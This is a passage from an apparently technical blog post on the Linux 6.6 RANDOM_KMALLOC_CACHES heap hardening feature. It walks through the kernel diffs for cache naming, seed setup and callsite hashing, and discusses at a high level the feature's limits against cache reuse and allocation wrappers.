</span></span></span><span class="line"><span class="cl">	<span class="n">KMALLOC_RECLAIM</span> <span class="o">=</span> <span class="n">KMALLOC_NORMAL</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="cp">#else
</span></span></span><span class="line"><span class="cl">	<span class="n">KMALLOC_RECLAIM</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_ZONE_DMA
</span></span></span><span class="line"><span class="cl">	<span class="n">KMALLOC_DMA</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl"><span class="cp">#ifdef CONFIG_MEMCG_KMEM
</span></span></span><span class="line"><span class="cl">	<span class="n">KMALLOC_CGROUP</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="cp">#endif
</span></span></span><span class="line"><span class="cl">	<span class="n">NR_KMALLOC_TYPES</span>
</span></span><span class="line"><span class="cl"><span class="p">};</span>
</span></span></code></pre></div><p>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h">include/linux/slab.h</a></p>
<p>The <code>[kmalloc_info[]](https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L824)</code> is another key data structure in the kmalloc cache initialisation. This array essentially contains a <code>[struct kmalloc_info_struct](https://elixir.bootlin.com/linux/v6.6/source/mm/slab.h#L275)</code> for each of the kmalloc &ldquo;bucket&rdquo; sizes we talk about. Each element stores the <code>size</code> fo the bucket and the <code>name</code> for the various caches types of that size. E.g. <code>kmalloc-rnd-01-64</code> or <code>kmalloc-cg-64</code>.</p>
<p>This array is then used to pull the correct cache <code>name</code> to pass to <code>[create_kmalloc_cache()](https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L661)</code> given the size index and cache type.</p>
<p>I&rsquo;m speeding through this, but you can probably tell already this is going to involve some macros. <code>[INIT_KMALLOC_INFO(__size, __short_size)](https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L809)</code> is used to initialise each of the elements in <code>kmalloc_info[]</code>, with additional macros to initialise each of the <code>name[]</code> elements according to type.</p>
<p>Below we can see the addition of the kmalloc random caches:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">ifdef</span> <span class="n">CONFIG_RANDOM_KMALLOC_CACHES</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">__KMALLOC_RANDOM_CONCAT</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">)</span> <span class="n">a</span> <span class="err">##</span> <span class="n">b</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMALLOC_RANDOM_NAME</span><span class="p">(</span><span class="n">N</span><span class="p">,</span> <span class="n">sz</span><span class="p">)</span> <span class="nf">__KMALLOC_RANDOM_CONCAT</span><span class="p">(</span><span class="n">KMA_RAND_</span><span class="p">,</span> <span class="n">N</span><span class="p">)(</span><span class="n">sz</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_1</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>                  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span>  <span class="mi">1</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-01-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_2</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="nf">KMA_RAND_1</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span>  <span class="mi">2</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-02-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_3</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="nf">KMA_RAND_2</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span>  <span class="mi">3</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-03-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_4</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="nf">KMA_RAND_3</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span>  <span class="mi">4</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-04-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_5</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="nf">KMA_RAND_4</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span>  <span class="mi">5</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-05-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_6</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="nf">KMA_RAND_5</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span>  <span class="mi">6</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-06-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_7</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="nf">KMA_RAND_6</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span>  <span class="mi">7</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-07-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_8</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="nf">KMA_RAND_7</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span>  <span class="mi">8</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-08-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_9</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="nf">KMA_RAND_8</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span>  <span class="mi">9</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-09-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_10</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="nf">KMA_RAND_9</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span>  <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span> <span class="mi">10</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-10-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_11</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="nf">KMA_RAND_10</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span> <span class="mi">11</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-11-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_12</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="nf">KMA_RAND_11</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span> <span class="mi">12</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-12-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_13</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="nf">KMA_RAND_12</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span> <span class="mi">13</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-13-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_14</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="nf">KMA_RAND_13</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span> <span class="mi">14</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-14-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMA_RAND_15</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="nf">KMA_RAND_14</span><span class="p">(</span><span class="n">sz</span><span class="p">)</span> <span class="p">.</span><span class="n">name</span><span class="p">[</span><span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span> <span class="mi">15</span><span class="p">]</span> <span class="o">=</span> <span class="s">&#34;kmalloc-rnd-15-&#34;</span> <span class="err">#</span><span class="n">sz</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="k">else</span> <span class="c1">// CONFIG_RANDOM_KMALLOC_CACHES
</span></span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">define</span> <span class="nf">KMALLOC_RANDOM_NAME</span><span class="p">(</span><span class="n">N</span><span class="p">,</span> <span class="n">sz</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">endif</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span>
</span></span><span class="line"><span class="cl"> <span class="cp">#define INIT_KMALLOC_INFO(__size, __short_size)			\
</span></span></span><span class="line"><span class="cl"><span class="cp"> {								\
</span></span></span><span class="line"><span class="cl"><span class="cp"> 	.name[KMALLOC_NORMAL]  = &#34;kmalloc-&#34; #__short_size,	\
</span></span></span><span class="line"><span class="cl"><span class="cp"> 	KMALLOC_RCL_NAME(__short_size)				\
</span></span></span><span class="line"><span class="cl"><span class="cp"> 	KMALLOC_CGROUP_NAME(__short_size)			\
</span></span></span><span class="line"><span class="cl"><span class="cp"> 	KMALLOC_DMA_NAME(__short_size)				\
</span></span></span><span class="line"><span class="cl"><span class="cp">+	KMALLOC_RANDOM_NAME(RANDOM_KMALLOC_CACHES_NR, __short_size)	\
</span></span></span><span class="line"><span class="cl"><span class="cp"> 	.size = __size,						\
</span></span></span><span class="line"><span class="cl"><span class="cp"> }
</span></span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="k">const</span> <span class="k">struct</span> <span class="n">kmalloc_info_struct</span> <span class="n">kmalloc_info</span><span class="p">[]</span> <span class="n">__initconst</span> <span class="o">=</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">0</span><span class="p">,</span> <span class="mi">0</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">96</span><span class="p">,</span> <span class="mi">96</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">192</span><span class="p">,</span> <span class="mi">192</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">8</span><span class="p">,</span> <span class="mi">8</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">16</span><span class="p">,</span> <span class="mi">16</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">32</span><span class="p">,</span> <span class="mi">32</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">64</span><span class="p">,</span> <span class="mi">64</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">128</span><span class="p">,</span> <span class="mi">128</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">256</span><span class="p">,</span> <span class="mi">256</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">512</span><span class="p">,</span> <span class="mi">512</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">1024</span><span class="p">,</span> <span class="mi">1</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">2048</span><span class="p">,</span> <span class="mi">2</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">4096</span><span class="p">,</span> <span class="mi">4</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">8192</span><span class="p">,</span> <span class="mi">8</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">16384</span><span class="p">,</span> <span class="mi">16</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">32768</span><span class="p">,</span> <span class="mi">32</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">65536</span><span class="p">,</span> <span class="mi">64</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">131072</span><span class="p">,</span> <span class="mi">128</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">262144</span><span class="p">,</span> <span class="mi">256</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">524288</span><span class="p">,</span> <span class="mi">512</span><span class="n">k</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">1048576</span><span class="p">,</span> <span class="mi">1</span><span class="n">M</span><span class="p">),</span>
</span></span><span class="line"><span class="cl">	<span class="nf">INIT_KMALLOC_INFO</span><span class="p">(</span><span class="mi">2097152</span><span class="p">,</span> <span class="mi">2</span><span class="n">M</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">};</span>
</span></span></code></pre></div><p>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L787">mm/slab_common.c</a></p>
<h3 id="seed-setup">Seed Setup</h3>
<p>Moving on, we can see how the per-boot seed is generated, which is one of the values used to randomise which cache a particular <code>kmalloc()</code> call site is going to end up in.</p>
<p>This is initialised during the initial kmalloc cache creation and is stored in the the exported symbol <code>[random_kmalloc_seed](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L398)</code>, as we can see below:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-C" data-lang="C"><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">ifdef</span> <span class="n">CONFIG_RANDOM_KMALLOC_CACHES</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">random_kmalloc_seed</span> <span class="n">__ro_after_init</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="nf">EXPORT_SYMBOL</span><span class="p">(</span><span class="n">random_kmalloc_seed</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">endif</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="p">...</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"><span class="kt">void</span> <span class="n">__init</span> <span class="nf">create_kmalloc_caches</span><span class="p">(</span><span class="kt">slab_flags_t</span> <span class="n">flags</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">    <span class="p">...</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">ifdef</span> <span class="n">CONFIG_RANDOM_KMALLOC_CACHES</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span>	<span class="n">random_kmalloc_seed</span> <span class="o">=</span> <span class="nf">get_random_u64</span><span class="p">();</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="err">#</span><span class="n">endif</span>
</span></span></code></pre></div><p>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/mm/slab_common.c#L956">mm/slab_common.c</a></p>
<p>It&rsquo;s worth noting here the <code>[__init](https://elixir.bootlin.com/linux/v6.6/source/include/linux/init.h#L52)</code> and <code>__ro_after_init</code> annotations. The former is a macro used to tell the kernel this code is only run during initialisation and doesn&rsquo;t need to hang around in memory after everything&rsquo;s setup.</p>
<p><code>__ro_after_init</code> was introduced by Kees Cook back in 2016<a href="https://lwn.net/Articles/676145/">[1]</a> to reduce the writable attack surface in the kernel by moving memory that&rsquo;s only written to during kernel initialisation to a read-only memory region.</p>
<h3 id="kmalloc-allocations">Kmalloc Allocations</h3>
<p>Okay, so we&rsquo;ve covered how the caches are created and the seed initialisation, how are objects then actually allocated to one of these random kmalloc caches?</p>
<p>As we touched on, the random cache a particular allocation ends up in comes from two factors: the <code>kmalloc()</code> callsite and the per-boot <code>random_kmalloc_seed</code>:</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-gdscript3" data-lang="gdscript3"><span class="line"><span class="cl"><span class="o">+</span><span class="k">static</span> <span class="n">__always_inline</span> <span class="k">enum</span> <span class="n">kmalloc_cache_type</span> <span class="n">kmalloc_type</span><span class="p">(</span><span class="n">gfp_t</span> <span class="n">flags</span><span class="p">,</span> <span class="n">unsigned</span> <span class="n">long</span> <span class="n">caller</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"> <span class="p">{</span>
</span></span><span class="line"><span class="cl"> 	<span class="o">/*</span>
</span></span><span class="line"><span class="cl"> 	 <span class="o">*</span> <span class="n">The</span> <span class="n">most</span> <span class="n">common</span> <span class="k">case</span> <span class="n">is</span> <span class="n">KMALLOC_NORMAL</span><span class="p">,</span> <span class="n">so</span> <span class="n">test</span> <span class="k">for</span> <span class="n">it</span>
</span></span><span class="line"><span class="cl"> 	 <span class="o">*</span> <span class="n">with</span> <span class="n">a</span> <span class="n">single</span> <span class="n">branch</span> <span class="k">for</span> <span class="n">all</span> <span class="n">the</span> <span class="n">relevant</span> <span class="n">flags</span><span class="o">.</span>
</span></span><span class="line"><span class="cl"> 	 <span class="o">*/</span>
</span></span><span class="line"><span class="cl"> 	<span class="k">if</span> <span class="p">(</span><span class="n">likely</span><span class="p">((</span><span class="n">flags</span> <span class="o">&amp;</span> <span class="n">KMALLOC_NOT_NORMAL_BITS</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">))</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="c1">#ifdef CONFIG_RANDOM_KMALLOC_CACHES</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span>		<span class="o">/*</span> <span class="n">RANDOM_KMALLOC_CACHES_NR</span> <span class="p">(</span><span class="o">=</span><span class="mi">15</span><span class="p">)</span> <span class="n">copies</span> <span class="o">+</span> <span class="n">the</span> <span class="n">KMALLOC_NORMAL</span> <span class="o">*/</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span>		<span class="k">return</span> <span class="n">KMALLOC_RANDOM_START</span> <span class="o">+</span> <span class="n">hash_64</span><span class="p">(</span><span class="n">caller</span> <span class="o">^</span> <span class="n">random_kmalloc_seed</span><span class="p">,</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span>						      <span class="n">ilog2</span><span class="p">(</span><span class="n">RANDOM_KMALLOC_CACHES_NR</span> <span class="o">+</span> <span class="mi">1</span><span class="p">));</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="c1">#else</span>
</span></span><span class="line"><span class="cl"> 		<span class="k">return</span> <span class="n">KMALLOC_NORMAL</span><span class="p">;</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span><span class="c1">#endif</span>
</span></span></code></pre></div><p>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L400">include/linux/slab.h</a></p>
<p>As we can see above, when calculating the kmalloc cache type for an allocation, if the flags are appropriate for the kmalloc random caches, a hash is generated from the two values mentioned and is used to calculate the kmalloc cache type (from the <code>[kmalloc_cache_type](https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L363)</code> enum, of which there is one for each <code>RANDOM_KMALLOC_CACHES_NR</code>), which is then used fetch the cache from <code>kmalloc_caches[]</code>.</p>
<div class="highlight"><pre tabindex="0" class="chroma"><code class="language-c" data-lang="c"><span class="line"><span class="cl"><span class="k">static</span> <span class="n">__always_inline</span> <span class="nf">__alloc_size</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="kt">void</span> <span class="o">*</span><span class="nf">kmalloc</span><span class="p">(</span><span class="kt">size_t</span> <span class="n">size</span><span class="p">,</span> <span class="kt">gfp_t</span> <span class="n">flags</span><span class="p">)</span>
</span></span><span class="line"><span class="cl"><span class="p">{</span>
</span></span><span class="line"><span class="cl">	<span class="k">if</span> <span class="p">(</span><span class="nf">__builtin_constant_p</span><span class="p">(</span><span class="n">size</span><span class="p">)</span> <span class="o">&amp;&amp;</span> <span class="n">size</span><span class="p">)</span> <span class="p">{</span>
</span></span><span class="line"><span class="cl">		<span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">index</span><span class="p">;</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl">		<span class="k">if</span> <span class="p">(</span><span class="n">size</span> <span class="o">&gt;</span> <span class="n">KMALLOC_MAX_CACHE_SIZE</span><span class="p">)</span>
</span></span><span class="line"><span class="cl">			<span class="k">return</span> <span class="nf">kmalloc_large</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">flags</span><span class="p">);</span>
</span></span><span class="line"><span class="cl">
</span></span><span class="line"><span class="cl"> 		<span class="n">index</span> <span class="o">=</span> <span class="nf">kmalloc_index</span><span class="p">(</span><span class="n">size</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"> 		<span class="k">return</span> <span class="nf">kmalloc_trace</span><span class="p">(</span>
</span></span><span class="line"><span class="cl"><span class="o">-</span>				<span class="n">kmalloc_caches</span><span class="p">[</span><span class="nf">kmalloc_type</span><span class="p">(</span><span class="n">flags</span><span class="p">)][</span><span class="n">index</span><span class="p">],</span>
</span></span><span class="line"><span class="cl"><span class="o">+</span>				<span class="n">kmalloc_caches</span><span class="p">[</span><span class="nf">kmalloc_type</span><span class="p">(</span><span class="n">flags</span><span class="p">,</span> <span class="n">_RET_IP_</span><span class="p">)][</span><span class="n">index</span><span class="p">],</span>
</span></span><span class="line"><span class="cl"> 				<span class="n">flags</span><span class="p">,</span> <span class="n">size</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"> 	<span class="p">}</span>
</span></span><span class="line"><span class="cl"> 	<span class="k">return</span> <span class="nf">__kmalloc</span><span class="p">(</span><span class="n">size</span><span class="p">,</span> <span class="n">flags</span><span class="p">);</span>
</span></span><span class="line"><span class="cl"><span class="p">}</span>
</span></span></code></pre></div><p>diff from <a href="https://elixir.bootlin.com/linux/v6.6/source/include/linux/slab.h#L590">include/linux/slab.h</a></p>
<p>We can see <code>kmalloc()</code> now passes the caller, using the <code>[_RET_IP_](https://elixir.bootlin.com/linux/v6.6/source/include/linux/instruction_pointer.h#L7)</code> macro, to <code>kmalloc_type()</code>. This means the <code>unsigned long caller</code> used to generate the hash is the return address for the <code>kmalloc()</code> call.</p>
<h3 id="thoughts">Thoughts</h3>
<p><img src="https://sam4k.com/content/images/2023/10/how_do_we_feel-1.gif" alt=""></p>
<p>To wrap things up on the implementation side of things, lets discuss some of the pros and cons for <code>KMALLOC_RANDOM_CACHES</code>. As the config help text explains, the aim of this hardening feature is to make it &ldquo;more difficult to spray vulnerable memory objects on the heap for the purpose of exploiting memory vulnerabilities.&rdquo;<a href="https://elixir.bootlin.com/linux/v6.6/source/mm/Kconfig#L339">[2]</a>.</p>
<p>It&rsquo;s safe to say (I think), that within the context of the current heap exploitation meta and exploring the feature&rsquo;s implementation, <strong>it does shake up the existing techniques</strong> commonly seen for shaping the heap and exploiting heap vulnerabilities.</p>
<p>On top of that, it&rsquo;s a reasonably <strong>lightweight</strong> and <strong>performance friendly</strong> implementation, pretty much exclusively touching the slab allocator implementation.</p>
<p>It is because of that last point, though, that it is <strong>unable to provide any mitigation against the cache reuse and overflow techniques</strong> mentioned earlier, as this relies on manipulating the underlying page allocator which isn&rsquo;t addressed by this patch.</p>
<p>As a result, in certain circumstances you could cause the free one of these random kmalloc cache slabs containing your vulnerable object and have it reallocated in a more favourable cache. Similar could be said for the cache overflow attacks.</p>
<p>An implementation specific point to note is on the use of the kmalloc return address (for <code>kmalloc()</code>, <code>kmalloc_node()</code>, <code>__kmalloc()</code> etc.) to determine which random kmalloc cache is used. If other parts of the kernel make wrappers around the slab API for their own purposes, such as <code>[f2fs_kmalloc()](https://elixir.bootlin.com/linux/v6.6/source/fs/f2fs/f2fs.h#L3379)</code>, <strong>any objects using that wrapper can share the same <code>_RET_IP_</code></strong> from the slab allocators perspective and end up in the same cache.</p>
<hr>
<ol>
<li><a href="https://lwn.net/Articles/676145/">https://lwn.net/Articles/676145/</a></li>
<li><a href="https://elixir.bootlin.com/linux/v6.6/source/mm/Kconfig#L339">https://elixir.bootlin.com/linux/v6.6/source/mm/Kconfig#L339</a></li>
</ol>
<h2 id="whats-the-new-meta">What&rsquo;s The New Meta?</h2>
<p><img src="https://sam4k.com/content/images/2023/10/are_we_in_trouble.gif" alt=""></p>
<p>Before we put our speculation hats on and start discussing what the new trends and techniques for heap exploitation might look like post <code>RANDOM_KMALLOC_CACHES</code>, it&rsquo;s worth highlighting that just because it&rsquo;s <em>in</em> the 6.6 kernel doesn&rsquo;t mean we&rsquo;ll see it for a while.</p>
<p>First of all, the 6.6 kernel is the latest release and it&rsquo;ll be a while until we see this get sizeable uptake in the real world. Secondly, it&rsquo;s currently an opt-in feature, disabled by default, so it really depends on the distros and vendors to enable this (and we all know that can take a while for security stuff! <em>cough</em> <code>modprobe_path</code>).</p>
